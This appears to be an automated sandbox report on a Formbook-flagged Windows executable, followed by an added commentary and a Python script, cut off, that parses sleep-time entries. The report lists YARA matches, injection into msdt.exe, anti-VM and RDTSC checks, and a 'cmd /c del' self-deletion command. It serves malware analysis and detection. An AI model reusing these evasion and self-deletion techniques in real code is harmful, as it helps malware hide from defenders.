Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code functions: 0_2_002769C9, 0_2_00276D30, 0_2_002790C0, 0_2_002790D0, 0_2_0027A44B, 0_2_00DA67E7, 0_2_00DA0048, 0_2_00DA5C18, 0_2_00DA0012, 0_2_00F57447, 0_2_002700F0
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code functions: 2_2_00401030, 2_2_0041BA85, 2_2_0041C296, 2_2_0041BBE0, 2_2_00408C6B, 2_2_00408C70, 2_2_0041C40C, 2_2_0041C4F7, 2_2_0041C55C, 2_2_00402D90, 2_2_00402FB0, 2_2_0089E0C6, 2_2_008CD005, 2_2_008A3040, 2_2_008B905A, 2_2_0089E2E9, 2_2_00941238, 2_2_0089F3CF, 2_2_008C63DB, 2_2_008A2305, 2_2_008A7353, 2_2_008EA37B, 2_2_008B1489, 2_2_008D5485, 2_2_008BC5F0, 2_2_008A351F, 2_2_008A4680, 2_2_008AE6C1, 2_2_00942622, 2_2_00F57447
      Source: C:\Windows\SysWOW64\msdt.exe  Code functions: 4_2_02641238, 4_2_0259E2E9, 4_2_025A7353, 4_2_025EA37B, 4_2_025A2305, 4_2_025C63DB, 4_2_0259F3CF, 4_2_025B905A, 4_2_025A3040, 4_2_025CD005, 4_2_0259E0C6, 4_2_02642622, 4_2_025AE6C1, 4_2_025A4680, 4_2_025D57C3, 4_2_025AC7BC, 4_2_0262579A, 4_2_025B1489, 4_2_025D5485, 4_2_025A351F, 4_2_025BC5F0, 4_2_02653A83, 4_2_025C7B00, 4_2_0259FBD7, 4_2_0262DBDA, 4_2_0264CBA4, 4_2_025AC85C, 4_2_025C286D, 4_2_0263F8EE, 4_2_02625955, 4_2_025B69FE, 4_2_025A29B2, 4_2_0264098E, 4_2_025BEE4C, 4_2_025D2E2F, 4_2_025CDF7C, 4_2_025B0F3F, 4_2_025ACD5B, 4_2_025D0D3B, 4_2_0263FDDD
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: String function: 025E373B appears 238 times
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: String function: 0260F970 appears 81 times
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: String function: 0259DF5C appears 107 times
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: String function: 0259E2A8 appears 38 times
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: String function: 025E3F92 appears 108 times
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: String function: 0089DF5C appears 50 times
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: String function: 008E3F92 appears 43 times
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: String function: 008E373B appears 81 times
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_004185D0 NtCreateFile
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_00418680 NtReadFile
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_00418700 NtClose
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_004187B0 NtAllocateVirtualMemory
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_004186FA NtClose
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_004187AA NtAllocateVirtualMemory
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_008900C4 NtCreateFile,LdrInitializeThunk
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_00890048 NtProtectVirtualMemory,LdrInitializeThunk
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_00890078 NtResumeThread,LdrInitializeThunk
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_008907AC NtCreateMutant,LdrInitializeThunk
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_0088F9F0 NtClose,LdrInitializeThunk
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_0088F900 NtReadFile,LdrInitializeThunk
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_0088FAD0 NtAllocateVirtualMemory,LdrInitializeThunk
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_0088FAE8 NtQueryInformationProcess,LdrInitializeThunk
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_0088FBB8 NtQueryInformationToken,LdrInitializeThunk
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_0088FB68 NtFreeVirtualMemory,LdrInitializeThunk
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_0088FC90 NtUnmapViewOfSection,LdrInitializeThunk
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_0088FC60 NtMapViewOfSection,LdrInitializeThunk
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_0088FD8C NtDelayExecution,LdrInitializeThunk
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_0088FDC0 NtQuerySystemInformation,LdrInitializeThunk
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_0088FEA0 NtReadVirtualMemory,LdrInitializeThunk
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_0088FED0 NtAdjustPrivilegesToken,LdrInitializeThunk
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_0088FFB4 NtCreateSection,LdrInitializeThunk
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_008910D0 NtOpenProcessToken
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_00890060 NtQuerySection
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_008901D4 NtSetValueKey
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_0089010C NtOpenDirectoryObject
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_00891148 NtOpenThread
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_025900C4 NtCreateFile,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_025907AC NtCreateMutant,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FAD0 NtAllocateVirtualMemory,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FAE8 NtQueryInformationProcess,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FAB8 NtQueryValueKey,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FB50 NtCreateKey,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FB68 NtFreeVirtualMemory,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FBB8 NtQueryInformationToken,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258F900 NtReadFile,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258F9F0 NtClose,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FED0 NtAdjustPrivilegesToken,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FFB4 NtCreateSection,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FC60 NtMapViewOfSection,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FDC0 NtQuerySystemInformation,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FD8C NtDelayExecution,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_02590048 NtProtectVirtualMemory
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_02590078 NtResumeThread
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_02590060 NtQuerySection
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_025910D0 NtOpenProcessToken
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_02591148 NtOpenThread
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0259010C NtOpenDirectoryObject
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_025901D4 NtSetValueKey
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FA50 NtEnumerateValueKey
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FA20 NtQueryInformationFile
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FBE8 NtQueryVirtualMemory
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258F8CC NtWaitForSingleObject
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258F938 NtWriteFile
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_02591930 NtSetContextThread
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FE24 NtWriteVirtualMemory
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FEA0 NtReadVirtualMemory
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FF34 NtQueueApcThread
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FFFC NtCreateProcessEx
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FC48 NtSetInformationFile
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_02590C40 NtGetContextThread
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FC30 NtOpenProcess
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FC90 NtUnmapViewOfSection
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0258FD5C NtEnumerateKey
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_02591D80 NtSuspendThread
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_001185D0 NtCreateFile
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_00118680 NtReadFile
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_00118700 NtClose
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_001187B0 NtAllocateVirtualMemory
      Source: ejecutable1.exe, 00000000.00000002.406383630.0000000001016000.00000002.00020000.sdmp  Binary or memory string: OriginalFilenameIDLFL.exe4 vs ejecutable1.exe
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp  Binary or memory string: OriginalFilenameColladaLoader.dll4 vs ejecutable1.exe
      Source: ejecutable1.exe, 00000000.00000002.405909286.00000000007A4000.00000004.00000020.sdmp  Binary or memory string: OriginalFilenameclr.dllT vs ejecutable1.exe
      Source: ejecutable1.exe, 00000000.00000002.406092250.0000000000C80000.00000004.00020000.sdmp  Binary or memory string: OriginalFilenameCF_Secretaria.dll< vs ejecutable1.exe
      Source: ejecutable1.exe, 00000002.00000002.443196696.0000000001016000.00000002.00020000.sdmp  Binary or memory string: OriginalFilenameIDLFL.exe4 vs ejecutable1.exe
      Source: ejecutable1.exe, 00000002.00000003.441170731.00000000028D0000.00000004.00000001.sdmp  Binary or memory string: OriginalFilenamemsdt.exej% vs ejecutable1.exe
      Source: ejecutable1.exe, 00000002.00000002.442687115.0000000000B00000.00000040.00000001.sdmp  Binary or memory string: OriginalFilenamentdll.dllj% vs ejecutable1.exe
      Source: ejecutable1.exe  Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\user\Desktop\ejecutable1.exe  Memory allocated: 76F90000 page execute and read and write
      Source: C:\Users\user\Desktop\ejecutable1.exe  Memory allocated: 76E90000 page execute and read and write
      Source: C:\Windows\SysWOW64\msdt.exe  Memory allocated: 76F90000 page execute and read and write
      Source: C:\Windows\SysWOW64\msdt.exe  Memory allocated: 76E90000 page execute and read and write
      Source: ejecutable1.exe  Virustotal: Detection: 36%
      Source: ejecutable1.exe  ReversingLabs: Detection: 13%
      Source: ejecutable1.exe  Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\ejecutable1.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknown  Process created: C:\Users\user\Desktop\ejecutable1.exe 'C:\Users\user\Desktop\ejecutable1.exe'
      Source: C:\Users\user\Desktop\ejecutable1.exe  Process created: C:\Users\user\Desktop\ejecutable1.exe C:\Users\user\Desktop\ejecutable1.exe
      Source: C:\Windows\explorer.exe  Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
      Source: C:\Windows\SysWOW64\msdt.exe  Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable1.exe'
      Source: C:\Users\user\Desktop\ejecutable1.exe  File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
      Source: classification engine  Classification label: mal100.troj.evad.winEXE@6/0@11/8
      Source: C:\Users\user\Desktop\ejecutable1.exe  Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
      Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmp  Binary or memory string: .VBPud<_
      Source: C:\Windows\explorer.exe  File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\ejecutable1.exe  File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: ejecutable1.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: ejecutable1.exe  Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: wntdll.pdb source: ejecutable1.exe, msdt.exe
      Source: Binary string: msdt.pdb source: ejecutable1.exe, 00000002.00000003.441140636.0000000002880000.00000004.00000001.sdmp

      Data Obfuscation:

      .NET source code contains potential unpacker
      Source: ejecutable1.exe, Darwin.WindowsForm/MainForm.cs  .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 0.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/MainForm.cs  .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 0.2.ejecutable1.exe.f50000.3.unpack, Darwin.WindowsForm/MainForm.cs  .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 2.2.ejecutable1.exe.f50000.4.unpack, Darwin.WindowsForm/MainForm.cs  .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 2.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/MainForm.cs  .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 0_2_0027EC70 push eax; retn 0027h  0_2_0027EC79
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 0_2_00DA44FA push ds; iretd  0_2_00DA44FB
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_0041B87C push eax; ret  2_2_0041B882
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_0041B812 push eax; ret  2_2_0041B818
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_0041B81B push eax; ret  2_2_0041B882
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_00415B53 push ds; ret  2_2_00415B1C
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_00415B1A push ds; ret  2_2_00415B1C
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_00415CE2 push 81CAEFA2h; retf  2_2_00415CE9
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_00415F6D push ss; ret  2_2_00415F74
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_0041B7C5 push eax; ret  2_2_0041B818
      Source: C:\Windows\SysWOW64\msdt.exe  Code function: 4_2_0259DFA1 push ecx; ret  4_2_0259DFB4
      Source: initial sample  Static PE information: section name: .text entropy: 6.99789102279

      Hooking and other Techniques for Hiding and Protection:

      Self deletion via cmd delete
      Source: C:\Windows\SysWOW64\msdt.exe  Process created: /c del 'C:\Users\user\Desktop\ejecutable1.exe'
      Deletes itself after installation
      Source: C:\Windows\SysWOW64\cmd.exe  File deleted: c:\users\user\desktop\ejecutable1.exe
      Source: C:\Users\user\Desktop\ejecutable1.exe  Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\msdt.exe  Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Yara detected AntiVM3
      Source: Yara match  File source: 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match  File source: Process Memory Space: ejecutable1.exe PID: 788, type: MEMORYSTR
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp  Binary or memory string: SBIEDLL.DLL
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp  Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\ejecutable1.exe  RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\ejecutable1.exe  RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\msdt.exe  RDTSC instruction interceptor: First address: 0000000000108604 second address: 000000000010860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\msdt.exe  RDTSC instruction interceptor: First address: 000000000010898E second address: 0000000000108994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\ejecutable1.exe TID: 1480  Thread sleep time: -45730s >= -30000s
      Source: C:\Users\user\Desktop\ejecutable1.exe TID: 1348  Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\explorer.exe TID: 2908  Thread sleep time: -50000s >= -30000s
      Source: C:\Windows\explorer.exe  Last function: Thread delayed
      Source: C:\Users\user\Desktop\ejecutable1.exe  Code function: 2_2_004088C0 rdtsc
      Source: C:\Users\user\Desktop\ejecutable1.exe  Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\ejecutable1.exe  Process information queried: ProcessInformation
      Source: C:\Users\user\Desktop\ejecutable1.exe  Thread delayed: delay time: 45730
      Source: C:\Users\user\Desktop\ejecutable1.exe  Thread delayed: delay time: 922337203685477
      Source: explorer.exe, 00000003.00000000.413682610.000000000457A000.00000004.00000001.sdmp  Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp  Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp  Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
      Source: explorer.exe, 00000003.00000000.408183204.00000000002C7000.00000004.00000020.sdmp  Binary or memory string: @z.SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000Z
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp  Binary or memory string: vmware
      Source: explorer.exe, 00000003.00000000.413682610.000000000457A000.00000004.00000001.sdmp  Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: explorer.exe, 00000003.00000000.463438478.00000000044E7000.00000004.00000001.sdmp  Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
      Source: explorer.exe, 00000003.00000000.408138486.000000000029B000.00000004.00000020.sdmp  Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
      Source: explorer.exe, 00000003.00000000.413770462.00000000045D6000.00000004.00000001.sdmp  Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp  Binary or memory string: VMware SVGA II
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp  Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_004088C0 rdtsc 2_2_004088C0
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008A26F8 mov eax, dword ptr fs:[00000030h]2_2_008A26F8
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025A26F8 mov eax, dword ptr fs:[00000030h]4_2_025A26F8
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00409B30 LdrLoadDll,2_2_00409B30
      Source: C:\Users\user\Desktop\ejecutable1.exeMemory allocated: page read and write | page guardJump to behavior
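
The two delay values in the "Thread sleep time" entries above deserve a second look: 45730 is an ordinary long sleep, but 922337203685477 is exactly 2**63 // 10000, i.e. the most negative 64-bit 100 ns relative interval the NT kernel accepts, expressed in milliseconds; that is the interval a Sleep(INFINITE)-style call hands to NtDelayExecution, so the thread is parked indefinitely rather than timed. The following script is an added example (not part of the Joe Sandbox report or its tooling) that parses lines in the report's format and labels each delay; it assumes the reported numbers are milliseconds even though the report suffixes them with "s", since the report's own 30000 comparison threshold only makes sense as 30 s. The sample lines are constructed to mirror the entries above.

```python
"""Decode sandbox "Thread sleep time" entries into short / long / infinite verdicts."""
import re
from dataclasses import dataclass

# 2**63 100 ns units expressed in ms: the magnitude of the Int64 minimum relative interval,
# which is what an infinite NtDelayExecution wait looks like once a sandbox prints it in ms.
NT_INFINITE_MS = 2**63 // 10_000        # 922337203685477
LONG_SLEEP_MS = 30_000                  # the threshold the report itself compares against (assumed ms)

# Constructed lines mirroring the report's format, with and without column separators.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\ejecutable1.exe TID: 1480Thread sleep time: -45730s >= -30000s",
    r"Source: C:\Users\user\Desktop\ejecutable1.exe | TID: 1348 | Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Windows\explorer.exe TID: 2908Thread sleep time: -50000s >= -30000s",
    r"Source: C:\Windows\explorer.exe TID: 3000Thread sleep time: -250s >= -30000s",
]

LINE_RE = re.compile(
    r"Source:\s*(?P<image>\S+?)\s*\|?\s*TID:\s*(?P<tid>\d+)\s*\|?\s*"
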